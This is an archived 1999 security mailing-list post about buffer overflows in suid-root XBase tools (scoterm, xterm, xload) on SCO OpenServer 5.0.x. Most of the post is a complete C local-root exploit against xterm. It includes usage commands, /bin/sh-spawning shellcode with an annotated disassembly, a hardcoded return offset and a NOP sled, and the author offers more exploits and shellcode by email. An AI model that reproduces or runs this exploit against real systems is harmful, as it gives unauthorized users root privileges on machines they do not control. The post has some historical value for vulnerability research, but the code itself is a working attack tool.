SCO Openserver XBase

From: dobleat_private
Date: Mon Jun 14 1999 - 13:48:35 PDT

Next message: Spy eye: "M1 website vulnerable"

Previous message: Aris Yahnis: "IIS 4.0 symlinks"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi:

This is not new, but i cant find exploits for it.

Almost all the tools that come with the XBase package of the SCO OpenServer
5.0.x are vulnerable to buffer overflow problems.

Some of these tools are suid root, like scoterm, xterm and xload, and are
very easy to exploit.

In newer versions, SCO have patched some holes but not all.

Here is a example of a exploit for one of these vulnerabilities.

-------------------------------------------------
/*
 * <xtermx.c> Local root exploit
 *
 * Offset: xterm (SCO OpenServer 5.0.4)
 * 0 -> From an open scoterm (without display parameter)
 * 2000 -> From remote telnet (with display parameter)
 *
 * Usage:
 * $ cc xtermx.c -o xtermx
 * $ scoterm
 * $ /usr/bin/X11/xterm -bg `xtermx`
 * 			or
 * $ /usr/bin/X11/xterm -display 1.1.1.1:0 -bg `xtermx 2000`
 *
 * Note: xterm need to be run from a valid x-display
 *
 * By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99)
 *
 * <http://members.tripod.com/~ochodedos> - <dobleat_private>
 *
 */


#include <stdlib.h>
#include <stdio.h>


char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/*
char hell[]=
"\xeb\x1b" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
"\x89\xf9" // movl %edi,%ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe0\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/


#define OFF 0x80471ff 	// SCO OpenServer 5.0.4
#define ALINEA 0
#define LEN 2000


int main(int argc, char *argv[]) {

int offset=0;
char buf[LEN];
int i;

if(argc < 2) {
	printf("Usage: xtermx [offset]\n"); }
else {
	offset=atoi(argv[1]); }

memset(buf,0x90,LEN);
memcpy(buf+1000,hell,strlen(hell));
for(i=1100+ALINEA;i<LEN-4;i+=4)
	*(int *)&buf[i]=OFF+offset;

for(i=0;i<LEN;i++)
	putchar(buf[i]);

exit(0);
}
-------------------------------------------------

If you want more exploits, shellcodes, or security help for SCO, my e-mail
is: dobleat_private


							The Dark Raver

Next message: Spy eye: "M1 website vulnerable"
Previous message: Aris Yahnis: "IIS 4.0 symlinks"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:50:15 PDT